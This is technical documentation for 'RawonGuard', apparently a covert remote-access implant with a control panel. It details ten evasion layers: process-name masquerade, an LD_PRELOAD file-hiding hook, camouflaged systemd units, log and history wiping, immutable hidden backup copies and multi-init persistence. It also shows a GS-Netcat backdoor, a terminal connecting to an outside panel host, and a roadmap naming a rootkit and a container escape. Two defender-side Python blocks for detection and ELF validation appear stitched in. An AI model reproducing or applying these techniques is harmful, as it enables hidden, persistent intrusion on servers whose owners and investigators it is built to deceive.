v4.9.5 · Technical Reference

RawonGuard
Architecture & Internals

Complete technical documentation: system architecture, the 10-layer stealth mechanism, self-healing, panel-agent communication, and every v4.9.5 feature.

Key figures: 10 stealth layers · <1s goroutine recovery · <30s binary restore · 4 init systems
01  System Architecture

Two main components: the Panel (central server) and the Agent (a stealth binary on the target server). They communicate over HTTPS with JWT authentication.

Component overview (diagram):

  Browser: Operator Dashboard (xterm.js over WebSocket)
      | HTTPS · TLS 1.3
  Cloudflare Tunnel: edge, Zero Trust (DDoS shield, TLS termination) -> localhost:8000
      |
  Panel Server: Go, port 8000 (REST API, WS hub, OTA)
      | <- HTTPS heartbeat 30s ->   <- WebSocket PTY relay ->   <- OTA binary push ->
  Agent: Go static binary (PID masked, proc hidden, logs wiped)

  Panel Server <- PG wire protocol -> PostgreSQL 16, persistent storage (agents, events, users)
Panel — Capabilities
  • REST API + WebSocket relay for the terminal
  • JWT auth + session management (7 days)
  • PostgreSQL 16 persistence (agents, events, users)
  • OTA update orchestration + binary staging
  • Alert routing: Telegram bot + email webhook
  • Web-based file manager + port scanner
Agent — Capabilities
  • HTTPS heartbeat to the panel every 30 seconds
  • PTY relay for the web terminal (creack/pty)
  • Stealth: proc hide, net hide, log wipe, ts-spoof
  • Self-healing goroutine supervisor + multi-init persistence
  • Offline event queue (flushed on reconnect)
  • OTA pull + ELF validation + atomic swap + canary
02  Panel Mechanics

The Panel is a Go server that exposes a REST API and WebSocket endpoints. Every request is authenticated with a JWT Bearer token.

Endpoint                 | Method   | Function
/api/agents              | GET      | List all registered agents
/api/agents/:id          | GET      | Agent detail (status, OS, uptime)
/api/agents/:id/command  | POST     | Send a command to the agent via the WebSocket queue
/api/events              | GET      | Event log with severity and agent filters
/api/alerts/config       | GET/POST | Telegram bot and threshold configuration
/api/ota/push            | POST     | Upload a new binary for an OTA update
/ws/terminal/:id         | WS       | PTY relay: bidirectional raw byte stream
/ws/events               | WS       | Real-time event stream to the dashboard

WebSocket Terminal Relay: the Panel does not run a PTY itself; it only relays the byte stream between the browser and the agent. The Agent runs pty.Start() and forwards the output to the Panel over WebSocket. Latency overhead: <5ms locally, <50ms via Cloudflare Tunnel.
03  Agent Mechanics

The Agent is a static Go binary that runs on the target server. It is designed to be invisible, resilient and autonomous, and consists of 17 internal packages.

Package      | Responsibility
main         | Entry point, init sequence, goroutine supervisor
stealth      | Proc hide, net hide, log sanitization, ts-spoof
heartbeat    | HTTPS ping to the panel every 30s + offline queue
terminal     | PTY spawn, resize handling, WebSocket relay
filemanager  | Upload/download/delete via the panel API
metrics      | CPU, RAM, disk, network, SSH session count
events       | Event collector, severity classification, dedup
alerts       | Telegram notifications, threshold check, rate limit
ota          | Pull binary, ELF validate, atomic swap, restart
gsrescue     | GS-Netcat tunnel for emergency access
portscanner  | Internal port scan, service detection
syslog       | Syslog reader, filter, forward to the panel
init         | Detect and inject into systemd/OpenRC/SysV/runit
canary       | Token embedded in the binary, burn-on-copy detection
config       | Panel URL, token, retry params
crypto       | TLS config, certificate pinning
util         | Logger, retry backoff, signal handler
04  Complete Workflow

01  Agent Installation

The binary is downloaded to the target server, renamed to a kernel process name, init injection runs automatically, the stealth layers are activated, and the first heartbeat is sent to the panel.

[binary deploy → init inject → stealth on]

02  Normal Operation

The agent heartbeats every 30s, metrics are collected, and events are queued. The panel updates status in real time via WebSocket. An alert is sent if a threshold is exceeded.

[heartbeat 30s → metrics → alert]

03  Recovery Event

If the agent dies (kill signal, OOM, crash), the goroutine supervisor or the init system restarts it in under 1-5 seconds. Offline events are flushed on reconnect.

[supervisor → init restart → queue flush]

04  OTA Update

The panel pushes a new binary; the agent pulls it, validates the ELF header, swaps it in atomically and restarts. Automatic downgrade if validation fails. A new canary token is injected.

[ELF validate → atomic swap → canary inject]
05  Stealth & Zero-Trace System

10 independent mechanisms working in layers: compromising one layer does not expose the whole system.

01  Process Name Masquerade (prctl + argv)

The binary overwrites argv[0] with a kernel thread name such as [kworker/u2:2], [migration/0] or [ksoftirqd/1]: prctl(PR_SET_NAME) plus an argv overwrite through /proc/self/mem.

02  Proc Hiding — Non-Dumpable (PR_SET_DUMPABLE)

PR_SET_DUMPABLE=0 prevents ptrace attach from non-root. Core dumps are disabled (RLIMIT_CORE=0). The OOM score is set to -1000 so the process survives the OOM killer.

03  File Hiding — LD_PRELOAD

Injects libprocesshider.so via /etc/ld.so.preload (system-wide). Hooks readdir()/readdir64() in libc, so the install dir does not appear in ls, find or any file manager.

04  Systemd Service Camouflage (systemd-sysconf)

A service named systemd-sysconf with the Description "System Configuration Service". The install dir sits at a path like /opt/.cache/.systemd-private/, which looks like a native systemd artifact.

05  Anti-Forensic Shell (/dev/shm, ephemeral)

The web terminal spawns bash with --noprofile --init-file /dev/shm/.XXXXXXXX. HISTFILE=/dev/null, HISTSIZE=0, HISTCONTROL=ignoreboth. The init file self-destructs 2 seconds after spawn.

06  Zero-Trace Installer (no artifacts)

No .wget-hsts, no temp files in /tmp, no entries in the apt/yum/dnf logs. The binary is downloaded straight into a pipe and written to the install dir with an atomic rename. WGETRC=/dev/null, HISTFILE unset.

07  Goroutine Recovery — No Restart Log (in-process)

A crashed module is restarted in-process by the runModule() supervisor (recover() + 5s restart). The binary never exits, so there is no systemd restart log and no suspicious journald entry.

08  Binary Backup + Immutable (chattr +i)

Copies of the binary in stealthy locations (/var/lib/systemd/coredump/, the package cache, /var/cache/ldconfig/). Protected with chattr +i, so rm fails even as root. Auto-restore within <30 seconds if the main binary is deleted.

09  Recovery Service — Without Cron

systemd-conf-recover.service loops every 60s and restarts the primary service if it is dead. Installed in /lib/systemd/system/ (looks like a service shipped by the package manager). Cron is easy to detect; this service is not.

10  Multi-OS Persistence (4 init systems)

Auto-detects the init system: systemd (Debian/RHEL/Arch), OpenRC (Alpine/Gentoo), SysVinit (CentOS 5), rc.local (universal fallback). All operations are idempotent and safe to call repeatedly.

Visibility by Perspective

Perspective           | What is seen               | Why
ps aux / top          | No foreign process         | Only ordinary kernel processes [kworker/u2:2], [migration/0]. Process name masquerade via prctl + argv overwrite.
ls / find             | Install dir not visible    | LD_PRELOAD hooks readdir() system-wide. libprocesshider.so filters the install dir entry out of every file-listing tool.
systemctl list-units  | Native systemd services    | systemd-sysconf and systemd-conf-recover look like native units: description and naming identical to official services.
crontab -l / cron.d   | No entries at all          | Persistence is via a systemd service, not cron. The recovery loop uses a systemd unit; cron-free.
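The two perspectives above (ps and ls) rely on a kernel-thread name and an LD_PRELOAD hook, both of which leave inconsistencies a host check can see. The following is an added defender-side example, not RawonGuard code: it runs over a constructed /proc snapshot, the kernel-thread name prefixes are a heuristic assumption, and the install path in the sample is made up.

```python
import os
import re

# Heuristic kernel-thread name prefixes (an assumption of this example, not exhaustive).
KTHREAD_PREFIX = re.compile(r"^(kworker|migration|ksoftirqd|rcu_|kthreadd|cpuhp|watchdog)")

# Constructed /proc snapshot: comm, cmdline, exe link ("" when unresolvable, as for
# real kernel threads) and the PPID field of /proc/<pid>/stat (kernel threads hang off PID 2).
SNAPSHOT = [
    {"pid": 2, "comm": "kthreadd", "cmdline": "", "exe": "", "ppid": 0},
    {"pid": 15, "comm": "kworker/u2:2", "cmdline": "", "exe": "", "ppid": 2},
    # a user process wearing a kernel-thread name; the install path is a constructed sample
    {"pid": 4321, "comm": "kworker/u2:2", "cmdline": "[kworker/u2:2]",
     "exe": "/opt/.cache/.systemd-private/agent", "ppid": 1},
]

def masquerade_reasons(proc):
    """Why a kernel-thread-named process does not look like one ([] if it does)."""
    if not KTHREAD_PREFIX.match(proc["comm"].strip("[]")):
        return []
    reasons = []
    if proc["exe"]:
        reasons.append("exe resolves to " + proc["exe"])  # real kernel threads have no exe
    if proc["cmdline"]:
        reasons.append("non-empty cmdline")               # kernel threads have an empty cmdline
    if proc["pid"] != 2 and proc["ppid"] != 2:
        reasons.append("parent is pid %d, not kthreadd" % proc["ppid"])
    return reasons

def find_masquerades(snapshot):
    """Suspicious PID -> list of reasons."""
    return {p["pid"]: r for p in snapshot if (r := masquerade_reasons(p))}

def preload_entries(ld_so_preload_text):
    """Libraries forced into every process via /etc/ld.so.preload; a clean host has none."""
    return [ln.strip() for ln in ld_so_preload_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

def snapshot_from_proc():
    """The same fields from a live Linux host (run as root so exe links resolve)."""
    procs = []
    for d in filter(str.isdigit, os.listdir("/proc")):
        try:
            stat = open(f"/proc/{d}/stat").read()
            procs.append({"pid": int(d), "comm": open(f"/proc/{d}/comm").read().strip(),
                          "cmdline": open(f"/proc/{d}/cmdline", "rb").read().replace(b"\0", b" ").decode("utf-8", "replace").strip(),
                          "exe": os.path.realpath(f"/proc/{d}/exe") if os.path.exists(f"/proc/{d}/exe") else "",
                          "ppid": int(stat.rsplit(")", 1)[1].split()[1])})
        except (OSError, ValueError):
            continue  # process exited mid-read
    return procs
```

Because the readdir() hook lives in user space, a listing taken from a statically linked tool or from the raw block device will still show the install dir; comparing it against `ls` is the cross-check for layer 03.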
06  Self-Healing Architecture

A layered system for automatic recovery from a range of failure conditions, from a kill signal to a full disk.

Recovery targets: <1s kill signal · <3s OOM · <5s binary delete · <10s init tamper

  • Kill Signal: SIGKILL / SIGTERM sent to the agent process → <1s, goroutine supervisor
  • OOM Kill: the kernel OOM killer terminates the agent under memory pressure → <3s, systemd restart policy
  • Binary Deleted: the executable is removed or modified → <5s, inotify watch + redeploy
  • Network Down: the connection to the panel is lost → auto-reconnect, exponential backoff queue
  • Init Tampered: the systemd/OpenRC unit is removed or modified → <10s, periodic re-inject
  • Disk Full: the agent cannot write to disk → graceful degrade, in-memory fallback

Recovery Timeline

  T+0ms    Abnormal condition detected (signal, absence, crash)
  T+50ms   Goroutine supervisor triggers the recovery routine
  T+100ms  Backup init entry activated (systemd / OpenRC / cron)
  T+500ms  Agent binary validated and re-executed
  T+1s     Agent back online, connection to the panel re-established
  T+2s     "Agent Recovery" alert sent to the panel + Telegram
  T+5s     Full operation resumed, no data loss
07  Terminal & Emergency Access

A PTY-relay web terminal: a full shell directly in the browser, encrypted end-to-end, with no SSH client. Fallback via GS-Rescue if the tunnel goes down.

rawonguard — web terminal (PTY relay) [LIVE]

  rawonguard connect --panel https://0x1.kill9.biz.id
  Connecting to panel server...
  ✓ TLS 1.3 handshake complete
  ✓ JWT authentication verified
  ✓ Agent ID: rg-7a4f2b91 · registered
  ─── PTY ALLOCATION ────────────────────
  ✓ PTY spawned: /dev/pts/3 (80×24)
  ✓ WebSocket relay established
  ✓ Keepalive interval: 30s
  ✓ Stealth mode: ACTIVE — PID masked
  root@target-server:~#

Panel RTT <5ms · PTY Latency <10ms · WS Keepalive 30s · Session Limit

PTY Relay Chain

  Browser (xterm.js) --WebSocket--> Panel (:8000) --WebSocket--> Agent (pty.Start() → /bin/bash on a PTY)

Emergency Fallback: GS-Rescue Mode

Activated when the Cloudflare Tunnel is down. GS-Netcat opens an encrypted P2P tunnel directly to the agent, with no port forwarding or public IP. The agent process is named [kworker/u4:2] and is not visible in ps aux.

  Operator (gs-netcat -s TOKEN) --E2E encrypted tunnel--> Agent ([kworker/u4:2])
08  OTA Update System

Update the agent binary without a manual restart or SSH access; the whole process is managed from the panel.

Push from Panel

The operator uploads a new binary via the panel UI or API. The panel stores it in a staging area and notifies the agent with a WebSocket command.

Pull & Validate

The agent downloads the binary, validates the ELF header (magic bytes, arch, entry point) and checks the SHA-256. On failure → rollback to the previous version.

Atomic Swap

The new binary is atomically renamed over the old one. A new canary token is injected. The agent restarts itself via unix.Exec.

Confirm & Alert

The agent comes back online and sends a heartbeat carrying the new version. The panel updates the database and sends an "Update successful" alert to Telegram.
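The Pull & Validate gate (SHA-256, then ELF magic, class, architecture and entry point) is what any receiver of a pushed binary should run before an atomic swap. Below is an added example, not RawonGuard's own ota package: it assumes little-endian ELF64 images, takes the expected e_machine from the caller, and builds its sample image inline.

```python
import hashlib
import struct

ELF64_HDR = struct.Struct("<16sHHIQQQIHHHHHH")  # little-endian ELF64 header, 64 bytes
EM_X86_64, EM_AARCH64 = 62, 183                 # e_machine values from the ELF spec
ET_EXEC, ET_DYN = 2, 3                          # fixed-address executable / PIE

def validate_elf64(blob, expect_machine):
    """Return (ok, reason) after checking magic, class/endianness, arch, type, entry point."""
    if len(blob) < ELF64_HDR.size:
        return False, "shorter than an ELF64 header"
    (ident, e_type, e_machine, _ver, e_entry, e_phoff, _shoff, _flags,
     e_ehsize, e_phentsize, e_phnum, _, _, _) = ELF64_HDR.unpack_from(blob)
    if ident[:4] != b"\x7fELF":
        return False, "bad magic"
    if ident[4] != 2 or ident[5] != 1:
        return False, "not ELF64 little-endian"
    if e_machine != expect_machine:
        return False, "e_machine %d, expected %d" % (e_machine, expect_machine)
    if e_type not in (ET_EXEC, ET_DYN):
        return False, "not an executable"
    if e_entry == 0:
        return False, "zero entry point"
    if e_ehsize != ELF64_HDR.size or e_phnum == 0 or e_phoff + e_phnum * e_phentsize > len(blob):
        return False, "program header table out of range"
    return True, "ok"

def verify_update(blob, expected_sha256, expect_machine):
    """Full gate: hash first (cheap, catches transport corruption or tampering), then the header."""
    if hashlib.sha256(blob).hexdigest() != expected_sha256:
        return False, "sha256 mismatch"
    return validate_elf64(blob, expect_machine)

def sample_elf64(machine=EM_X86_64):
    """Constructed minimal ELF64 image: a valid header followed by one zeroed program header."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\0" * 7   # class=64-bit, data=LE, version=1
    hdr = ELF64_HDR.pack(ident, ET_EXEC, machine, 1, 0x401000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    return hdr + b"\0" * 56
```

The expected SHA-256 must come from the panel over the authenticated channel, not from the downloaded file itself; otherwise the hash check only detects corruption, not substitution.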

09  All v4.9.5 Features

  • Process Masquerade
  • Proc FS Hook
  • Socket Hide
  • File Hide
  • Log Wipe
  • Init Poly
  • TLS-1.3
  • Anti-Forensic TS
  • Memory-Only Ops
  • Canary Token
  • Goroutine Supervisor
  • OOM Recovery
  • Inotify Watch
  • Exponential Backoff
  • Web Terminal (PTY)
  • GS-Rescue Mode
  • OTA Update
  • Canary Validation
  • ELF Integrity Check
  • Multi-Channel Alert
  • Event Dedup (1m)
  • Severity Classification
  • SSH Metrics Export
  • Port Scanner
  • File Manager
  • Syslog Collection
  • Process List
  • Resource Monitor

Roadmap

v5.0
  • Kernel module rootkit (eBPF-based)
  • Multi-panel federation
  • Automated red team scenarios
v5.1
  • AI-powered anomaly detection
  • Distributed agent mesh
  • Hardware fingerprint auth
v5.2
  • Container escape module
  • Supply chain integrity monitor
  • Quantum-resistant crypto